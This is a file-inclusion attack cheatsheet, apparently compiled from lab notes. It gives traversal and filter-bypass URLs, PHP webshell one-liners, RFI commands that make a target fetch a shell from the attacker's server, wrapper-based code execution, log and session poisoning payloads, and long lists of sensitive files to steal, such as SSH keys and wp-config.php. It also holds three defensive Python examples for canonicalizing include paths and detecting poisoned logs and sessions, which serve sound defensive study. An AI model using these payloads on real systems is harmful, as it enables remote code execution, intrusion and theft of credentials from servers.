# File path traversal/Local File Inclusion

## Wordlists

**Windows:** <https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt>

**Linux:** <https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt>

**Awesome Wordlist**

| [LFI Wordlists](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI)                                                                      |
| -------------------------------------------------------------------------------------------------------------------------------------------------------- |
| [LFI-Jhaddix.txt](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt)                                                    |
| [Webroot path wordlist for Linux](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-linux.txt)     |
| [Webroot path wordlist for Windows](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt) |
| [Server configurations wordlist for Linux](https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Linux)                        |
| [Server configurations wordlist for Windows](https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Windows)                    |

## **File Inclusion Functions**

| Function | Read Content | Execute | Remote URL |
| --- | --- | --- | --- |
| **PHP** | | | |
| `include()`/`include_once()` | Yes | Yes | Yes |
| `require()`/`require_once()` | Yes | Yes | No |
| `file_get_contents()` | Yes | No | Yes |
| `fopen()`/`file()` | Yes | No | No |
| **NodeJS** | | | |
| `fs.readFile()` | Yes | No | No |
| `fs.sendFile()` | Yes | No | No |
| `res.render()` | Yes | Yes | No |
| **Java** | | | |
| `include` | Yes | No | No |
| `import` | Yes | Yes | Yes |
| **.NET** | | | |
| `@Html.Partial()` | Yes | No | No |
| `@Html.RemotePartial()` | Yes | No | Yes |
| `Response.WriteFile()` | Yes | No | No |
| `include` | Yes | Yes | Yes |

## Cheatsheet

```sh
#Basic LFI
http://example.com/index.php?page=../../../etc/passwd
#Null Byte
http://example.com/index.php?page=../../../etc/passwd%00
http://example.com/index.php?page=../../../etc/passwd%00.png
#Double Encoding
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
#UTF-8 Encoding
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00
#Path Truncation
http://example.com/index.php?page=../../../etc/passwd............[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE]
http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd
#Filter Bypass
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
```

## **Remote File Inclusion (RFI)**

Remote File Inclusion no longer works on a default configuration, because `allow_url_include` has been disabled by default since PHP 5.

```bash
#Create malicious file
Intrusionz3r0@htb[/htb]$ echo '<?php system($_GET["cmd"]); ?>' > shell.php
Intrusionz3r0@htb[/htb]$ echo 'GIF8<?php system($_GET[0]); ?>' > shell.gif
Intrusionz3r0@htb[/htb]$ echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php #output file

#Set up a server
Intrusionz3r0@htb[/htb]$ sudo python3 -m http.server <LISTENING_PORT>
Intrusionz3r0@htb[/htb]$ sudo python -m pyftpdlib -p 21
Intrusionz3r0@htb[/htb]$ impacket-smbserver -smb2support share $(pwd)

#Trigger the RFI through the URL
Intrusionz3r0@htb[/htb]$ curl 'http://<SERVER_IP>:<PORT>/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id'
Intrusionz3r0@htb[/htb]$ curl 'http://<SERVER_IP>:<PORT>/index.php?language=ftp://user:pass@localhost/shell.php&cmd=id'
Intrusionz3r0@htb[/htb]$ curl 'http://<SERVER_IP>:<PORT>/index.php?language=\\\\<OUR_IP>\\share\\shell.php&cmd=whoami'
```

## Wrappers

```bash
#Read files and return them base64-encoded to bypass restrictions
php://filter/read=convert.base64-encode/resource=<path-filename>

#Remote Code Execution wrappers
data://text/plain;base64,<base64-string>&cmd=<command>
php://input&cmd=<command>
expect://<command>

#Upload LFI to RCE

#Zip file (single quotes so the shell does not expand $_GET)
Intrusionz3r0@htb[/htb]$ echo '<pre><?php system($_GET["cmd"]); ?></pre>' > payload.php;
Intrusionz3r0@htb[/htb]$ zip payload.zip payload.php;
Intrusionz3r0@htb[/htb]$ mv payload.zip shell.jpg;
Intrusionz3r0@htb[/htb]$ rm payload.php

zip://./profile_images/shell.jpg%23shell.php&cmd=id

#RAR file
Intrusionz3r0@htb[/htb]$ rar a payload.rar payload.php;
Intrusionz3r0@htb[/htb]$ mv payload.rar shell.jpg;
Intrusionz3r0@htb[/htb]$ rm payload.php

rar://./profile_images/shell.jpg%23shell.php&cmd=id
```

PHAR malicious file (save as `shell.php`):

```php
<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();
```

```bash
#Compile file
Intrusionz3r0@htb[/htb]$ php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id
```
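The encodings in the cheatsheet, the remote schemes in the RFI section and the PHP wrappers above all exploit the same weak spot: an include check that runs before the value has been canonicalized. The following Python is an added example, not code from the original page or from HTB, showing how a defender's include check canonicalizes first (repeated percent-decoding, strict UTF-8, null-byte truncation, backslash separators) and only then rejects wrappers and anything resolving outside the web root; the web root `/var/www/html`, the function names and the verdict labels are assumptions.

```python
import os
import re
from urllib.parse import unquote

# A stream wrapper or remote scheme (php://, data:, expect://, zip://, phar://, ftp://, http://).
# At least two letters before the colon, so a Windows drive letter such as C:/ is not a scheme.
WRAPPER_RE = re.compile(r"^[a-z][a-z0-9+.-]+:", re.IGNORECASE)


def canonicalize(value, max_rounds=3):
    """Undo what the bypass payloads rely on before any check runs: repeated
    percent-decoding (double encoding) and null-byte truncation. Strict UTF-8
    decoding makes the overlong %c0%ae form raise UnicodeDecodeError."""
    s = value
    for _ in range(max_rounds):
        decoded = unquote(s, errors="strict")
        if decoded == s:
            break
        s = decoded
    # A C-level open() stops at the first NUL byte; compare what it would actually see.
    return s.split("\x00", 1)[0]


def check_include(base_dir, value):
    """Classify an include parameter against a web root (assumed /var/www/html in
    the usage below). Returns (verdict, lexical target path or None). The containment
    test is lexical only; production code must also realpath() the target so a
    symlink inside the root cannot point outside it."""
    try:
        cleaned = canonicalize(value)
    except UnicodeDecodeError:
        return "invalid-utf8", None
    if WRAPPER_RE.match(cleaned) or cleaned.startswith("\\\\"):
        return "wrapper", None            # stream wrapper or UNC share: no local file at all
    cleaned = re.sub(r"/+", "/", cleaned.replace("\\", "/"))   # %5C and ..//// tricks
    base = os.path.normpath(base_dir)
    target = os.path.normpath(os.path.join(base, cleaned))     # an absolute value replaces base
    if os.path.commonpath([base, target]) != base:
        return "outside-base", target
    # "....//" survives as a harmless directory name inside base: it only defeats
    # filters that strip "../" a single time, not a canonical containment check.
    return "ok", target


if __name__ == "__main__":
    for v in ("es.php", "../../../etc/passwd%00.png", "%252e%252e%252fetc%252fpasswd",
              "%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd", "php://filter/resource=index.php"):
        print(repr(v), "->", check_include("/var/www/html", v))
```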

## **Automated Scanning**

```bash
#Fuzzing parameters
Intrusionz3r0@htb[/htb]$ ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287

#Fuzzing LFI paths Windows/Linux
Intrusionz3r0@htb[/htb]$ ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287

#Discover server webroot
Intrusionz3r0@htb[/htb]$ ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287

#Server logs and configuration (precise scan using the DragonJAR wordlist)
Intrusionz3r0@htb[/htb]$ ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287
```

## Log Poisoning attack

```sh
# Apache Logs
?page=/var/log/apache/access.log
?page=/var/log/apache/error.log
?page=/var/log/apache2/access.log
?page=/var/log/apache2/error.log

# Nginx Logs
?page=/var/log/nginx/access.log
?page=/var/log/nginx/error.log
?page=/usr/local/nginx/logs/access.log
?page=/usr/local/nginx/logs/error.log

# PHP Logs (Common in Apache/Nginx setups)
?page=/var/log/php_errors.log
?page=/etc/php/7.4/fpm/php-fpm.log
?page=/etc/php/8.0/fpm/php-fpm.log

# System Logs (SSH)
?page=/var/log/auth.log
?page=/var/log/secure
?page=/var/log/syslog
?page=/var/log/messages

# Custom Logs (Shared Hosting or Web Servers)
?page=/home/<username>/logs/error_log
?page=/home/<username>/logs/access_log

```

### **Server log poisoning**

By default, `Apache` logs are located in `/var/log/apache2/` on Linux and in `C:\xampp\apache\logs\` on Windows, while `Nginx` logs are located in `/var/log/nginx/` on Linux and in `C:\nginx\log\` on Windows.

The relevant files in those directories are:

* `access.log`
* `error.log`

Payload: `http://<SERVER_IP>:<PORT>/index.php?language=/var/log/apache2/access.log`

<figure><img src="/files/9B3PkXJFSrdtUXpk7u2K" alt=""><figcaption></figcaption></figure>

#### Poisoning the logs

```bash
Intrusionz3r0@htb[/htb]$ curl -s "http://<SERVER_IP>:<PORT>/index.php" -A '<?php system($_GET["cmd"]); ?>'   # single quotes so the shell does not expand $_GET
```

#### Read the logs through LFI

<figure><img src="/files/DLnVN0jxjsCPCpMF1pQd" alt=""><figcaption></figcaption></figure>
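As an added detection example (not from the original page), the following Python scans Apache/Nginx combined-format access log lines for both halves of the attack described above: a PHP open tag in a client-controlled field (the poisoning request) and an include parameter that names a log file (the read-back), then correlates the two by source IP. The log lines are constructed, and the regexes and function names are assumptions.

```python
import re

# Apache/Nginx "combined" log format; quoted fields may contain backslash-escaped quotes.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)
# The write half: a PHP open tag in any client-controlled field that ends up in the log.
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=|\s)", re.IGNORECASE)
# The read half: a query string that names a log file.
LOG_READ_RE = re.compile(r"/var/log/|access[._-]?log|error[._-]?log|php-fpm\.log", re.IGNORECASE)


def scan_access_log(lines):
    """Return one finding per suspicious entry: {'ip', 'kind', 'field', 'value'}."""
    findings = []
    for line in lines:
        m = COMBINED_RE.match(line.rstrip("\n"))
        if not m:
            continue                      # a real collector would count unparsable lines
        ip, request = m.group("ip"), m.group("request")
        for field in ("request", "referer", "agent"):
            if PHP_TAG_RE.search(m.group(field)):
                findings.append({"ip": ip, "kind": "php_tag", "field": field, "value": m.group(field)})
        query = request.partition("?")[2]  # only the query string, not the path itself
        if LOG_READ_RE.search(query):
            findings.append({"ip": ip, "kind": "log_read", "field": "request", "value": request})
    return findings


def poisoning_chains(findings):
    """IPs that both planted a PHP tag and requested a log file: the complete chain."""
    by_ip = {}
    for f in findings:
        by_ip.setdefault(f["ip"], set()).add(f["kind"])
    return sorted(ip for ip, kinds in by_ip.items() if {"php_tag", "log_read"} <= kinds)


# Constructed sample: the poisoning request from this page, the read-back, and a normal visitor.
SAMPLE_LOG = r"""10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 2287 "-" "<?php system($_GET['cmd']); ?>"
10.0.0.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?language=/var/log/apache2/access.log&cmd=id HTTP/1.1" 200 5123 "-" "curl/7.88.1"
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?language=es HTTP/1.1" 200 2287 "-" "Mozilla/5.0 (X11; Linux x86_64)"
""".splitlines()

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f["ip"], f["kind"], f["field"], f["value"])
    print("chains:", poisoning_chains(scan_access_log(SAMPLE_LOG)))
```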

### **PHP Session Poisoning**

Most PHP web applications use the `PHPSESSID` cookie to identify a session, and the corresponding session data is stored in a file on the back end:

* **Linux:** `/var/lib/php/sessions/sess_<PHPSESSID>`
* **Windows:** `C:\Windows\Temp\sess_<PHPSESSID>`

The name of the file that contains our user's data is the value of our `PHPSESSID` cookie with the `sess_` prefix.

```bash
#Poison the session file through the vulnerable parameter
http://<SERVER_IP>:<PORT>/index.php?language=<?php%20system($_GET[0]);%20?>
#Include the session file through the LFI
http://<SERVER_IP>:<PORT>/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&0=pwd
```
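To check whether a session file on the server already carries injected code, the following Python (an added example, not from the original page) parses PHP's default `php` session serialization format for the scalar types and flags every value containing a PHP open tag. The sample session content is constructed and the function names are assumptions.

```python
import re

PHP_TAG_RE = re.compile(r"<\?(?:php\b|=|\s)", re.IGNORECASE)


def parse_php_session(raw):
    """Parse the default 'php' session serializer: key|<serialized>;key|... for the scalar
    types s (string), i (int), d (float), b (bool) and N (null). Nested arrays (a:) are
    not handled and raise ValueError. Read real files with encoding='latin-1' so that
    len() matches the byte counts PHP writes into s:<len>."""
    out, i, n = {}, 0, len(raw)
    while i < n:
        bar = raw.index("|", i)
        key, i = raw[i:bar], bar + 1
        t = raw[i]
        if t == "s":                              # s:<len>:"<bytes>";
            colon = raw.index(":", i + 2)
            length = int(raw[i + 2:colon])
            start = colon + 2                     # skip ':"'
            out[key] = raw[start:start + length]  # length-prefixed: a '|' or ';' inside is data
            i = start + length + 2                # skip '";'
        elif t in "id":                           # i:<int>;  d:<float>;
            end = raw.index(";", i)
            out[key] = (int if t == "i" else float)(raw[i + 2:end])
            i = end + 1
        elif t == "b":                            # b:0; / b:1;
            out[key] = raw[i + 2] == "1"
            i += 4
        elif t == "N":                            # N;
            out[key] = None
            i += 2
        else:
            raise ValueError(f"unsupported type {t!r} at offset {i}")
    return out


def find_poisoned_keys(session):
    """Keys whose string value would execute if the session file were include()d."""
    return [k for k, v in session.items() if isinstance(v, str) and PHP_TAG_RE.search(v)]


# Constructed session file content: 'page' holds the payload from the request above,
# the other keys are what an ordinary session looks like.
SAMPLE_SESSION = 'page|s:26:"<?php system($_GET[0]); ?>";preference|s:4:"dark";logged_in|b:1;uid|i:7;'

if __name__ == "__main__":
    print(find_poisoned_keys(parse_php_session(SAMPLE_SESSION)))   # ['page']
```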

## Interesting Files

```sh
# Home directories
?page=/home/<username>/.bashrc
?page=/home/<username>/.bash_history
?page=/home/<username>/.bash_logout
?page=/home/<username>/.bash_profile
?page=/home/<username>/.profile
?page=/home/<username>/.ssh/id_rsa

# Root directory
?page=/root/.bashrc
?page=/root/.bash_history
?page=/root/.bash_logout
?page=/root/.bash_profile
?page=/root/.profile
?page=/root/.ssh/id_rsa

# System-wide configurations
?page=/etc/bash.bashrc

# OS
?page=/etc/lsb-release
?page=/etc/os-release

# Processes
?page=/proc/self/stat
?page=/proc/net/tcp
?page=/proc/self/cmdline
?page=/proc/self/environ
?page=/proc/self/fd/0
?page=/proc/self/fd/1
?page=/proc/<pid>/cmdline
?page=/proc/<pid>/environ

# Mail
?page=/var/mail/<username>
?page=/var/spool/mail/<username>
# Postfix
?page=/var/log/mail.log
?page=/var/log/maillog

# Host
?page=/etc/hosts
?page=/etc/hostname
# Cron
?page=/etc/crontab

# Web root
?page=/var/www/html/index.html
?page=/var/www/html/index.php
?page=/var/www/html/.htaccess
?page=/var/www/html/.htpasswd
?page=/var/www/example.com/index.php
?page=/var/www/subdomain/index.php
?page=/var/www/subdomain.example.com/index.php
?page=/var/www/wordpress/index.php

# Apache
?page=/etc/apache2/.htpasswd
?page=/etc/apache2/apache2.conf
?page=/etc/apache2/envvars
?page=/etc/apache2/ports.conf
?page=/etc/apache2/sites-available/domain.conf
?page=/etc/apache2/sites-available/example.com.conf
?page=/etc/apache2/sites-available/sub.example.com.conf
?page=/etc/apache2/sites-available/sub.conf
?page=/etc/apache2/sites-enabled/000-default.conf
?page=/etc/apache2/sites-enabled/domain.conf
?page=/etc/apache2/sites-enabled/example.com.conf
?page=/etc/apache2/sites-enabled/sub.example.com.conf
?page=/etc/apache2/sites-enabled/sub.conf
?page=/var/log/apache/access.log
?page=/var/log/apache/error.log
?page=/var/log/apache2/access.log
?page=/var/log/apache2/error.log

# Apache Tomcat
?page=/opt/tomcat/conf/tomcat-users.xml
?page=/opt/tomcat/logs/catalina.err
?page=/opt/tomcat/logs/catalina.out

# Nginx
?page=/var/log/nginx/access.log
?page=/var/log/nginx/error.log
?page=/etc/nginx/nginx.conf
?page=/etc/nginx/conf.d/.htpasswd
?page=/etc/nginx/conf.d/example.com.conf
?page=/etc/nginx/conf.d/example.conf
?page=/etc/nginx/conf.d/subdomain.example.com.conf
?page=/etc/nginx/conf.d/subdomain.conf
?page=/etc/nginx/sites-available/default
?page=/etc/nginx/sites-available/example.com.conf
?page=/etc/nginx/sites-enabled/default
?page=/etc/nginx/sites-enabled/example.com.conf
?page=/usr/local/nginx/conf/nginx.conf
?page=/usr/local/etc/nginx/nginx.conf

# PHP web conf (x.x is specified PHP version)
?page=/etc/php/x.x/apache2/php.ini
?page=/etc/php/x.x/cli/php.ini
?page=/etc/php/x.x/fpm/php.ini

# Flask
?page=index.html
?page=../__init__.py
?page=../app.py
?page=../db.py
?page=../main.py
?page=/home/<username>/<appname>/app.py
?page=/opt/<appname>/app.py
?page=/srv/<appname>/app.py

# BIND
?page=/etc/bind/named.conf
?page=/etc/bind/named.conf.options
?page=/etc/bind/named.conf.local
?page=/etc/bind/named.conf.default-zones

# Windows
?page=C:/Windows/debug/NetSetup.log 
?page=C:/Windows/System32/drivers/etc/hosts
?page=C:/Windows/System32/inetsrv/config/applicationHost.config
?page=../../../../../../../../windows/system32/drivers/etc/hosts
?page=C:/Users/Public/Desktop/desktop.ini
?page=C:/Users/FUZZ/Desktop/desktop.ini # user enumeration
?page=C:/inetpub/wwwroot/<project>/web.config
?page=C:/xampp/apache/conf/httpd.conf
?page=C:/xampp/apache/conf/extra/httpd-userdir.conf
?page=C:/xampp/apache/conf/extra/httpd-vhosts.conf
?page=C:/xampp/apache/conf/extra/httpd-xampp.conf
?page=C:/xampp/apache/conf/extra/httpd-ajp.conf
?page=C:/xampp/apache/logs/access.log
?page=C:/xampp/apache/logs/error.log
?page=C:/xampp/cgi-bin/example.cgi
?page=C:/xampp/htdocs/example.com/index.php
?page=C:/xampp/htdocs/sub.example.com/index.php
?page=C:/xampp/phpMyAdmin/index.php
?page=C:/xampp/phpMyAdmin/config.inc.php

```

## LFI Interesting Wordpress Files

```sh
# WordPress Core Files
?page=wp-config.php
?page=.htaccess
?page=.user.ini
?page=wp-includes/version.php
?page=wp-content/themes/twentytwentyone/functions.php
?page=wp-content/themes/twentytwentythree/functions.php
?page=wp-content/plugins/hello.php
?page=wp-content/uploads/.htaccess
?page=wp-content/uploads/custom-image.jpg

# WordPress Database Configurations
?page=/var/www/html/wordpress/wp-config.php
?page=/var/www/wordpress/wp-config.php
?page=/var/www/example.com/wp-config.php
?page=/var/www/sub.example.com/wp-config.php
?page=/var/www/html/wordpress/wp-content/plugins/akismet/akismet.php
?page=/var/www/html/wordpress/wp-content/themes/twentytwenty/functions.php

# Backup Files
?page=/var/backups/wordpress.sql
?page=/var/backups/wordpress.zip
?page=/var/backups/db.sql
?page=/var/backups/wp-content.zip

# Logs and Debugging Files
?page=debug.log
?page=/var/www/html/wordpress/wp-content/debug.log
?page=/var/www/html/wordpress/wp-content/uploads/debug.log
?page=/var/log/apache2/access.log
?page=/var/log/apache2/error.log
?page=/var/log/nginx/access.log
?page=/var/log/nginx/error.log

# WordPress JSON REST API
?page=/wp-json/wp/v2/posts
?page=/wp-json/wp/v2/users
?page=/wp-json/wp/v2/pages
?page=/wp-json/wp/v2/media

# XMLRPC Files
?page=/xmlrpc.php
?page=/wp-includes/IXR/class-IXR.php

# Sensitive Directories
?page=/wp-content/
?page=/wp-admin/
?page=/wp-includes/
?page=/wp-content/uploads/
?page=/wp-content/plugins/
?page=/wp-content/themes/

# Plugins Configuration
?page=/wp-content/plugins/woocommerce/includes/class-wc-cart.php
?page=/wp-content/plugins/elementor/includes/plugin.php
?page=/wp-content/plugins/contact-form-7/includes/controller.php

# Themes Configuration
?page=/wp-content/themes/twentytwentyone/style.css
?page=/wp-content/themes/twentytwenty/functions.php
?page=/wp-content/themes/customtheme/style.css

# wp-cli
?page=/usr/local/bin/wp-cli.phar

# Cron Jobs
?page=/wp-cron.php

# System Configurations
?page=/etc/apache2/apache2.conf
?page=/etc/apache2/sites-enabled/000-default.conf
?page=/etc/nginx/sites-available/default
?page=/etc/nginx/sites-available/wordpress.conf
?page=/etc/php/7.4/apache2/php.ini
?page=/etc/php/8.0/apache2/php.ini

# Database Files
?page=/var/lib/mysql/wordpress/wp_users.MYD
?page=/var/lib/mysql/wordpress/wp_posts.MYD
?page=/var/lib/mysql/wordpress/wp_options.MYD
?page=/var/lib/mysql/mysql/user.MYD

```

